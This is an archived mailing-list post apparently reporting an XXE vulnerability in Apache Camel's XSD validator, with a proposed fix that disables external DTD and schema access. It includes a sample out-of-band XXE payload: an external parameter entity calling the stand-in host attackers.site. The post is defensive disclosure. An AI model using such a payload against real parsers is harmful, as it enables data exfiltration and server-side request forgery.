git.net

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XML External Entity (XXE) - validator vulnerability ?


Dear All,
we are using XSD validation processor by camel-core library

...
.to("validator:classpath:xsd/exportenv70.xsd")
...

Our penetration tests found that application can be attacked by "XML External Entity (XXE)" (https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#Validator)

We think that classes infected by this vulnerability are

org.apache.camel.processor.validation.SchemaReader.java
org.apache.camel.processor.validation.ValidatingProcessor.java

Method SchemaReader.createSchemaFactory should also set property "factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");"

Method ValidatingProcessor.doProcess should set property to validator class

Validator validator = schema.newValidator();
//prevent XXE attack
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

If we try to validate infected XML against XSD we can see that camel is trying to access external site (attackers.site) in this example

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://attackers.site:53/TEST";>
%remote;
%run;
%trick;]>

Disabling mentioned properties should do the trick

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#Validator


I would like to ask you if this will be created as a security BUG in camel and if it will be fixed in the future version?

Can we use some workaround? Write our custom implementation of ValidatingProcessor? Is it possible?

--

Best regards

Karel Jelínek
Unicorn Systems
https://unicorn.com/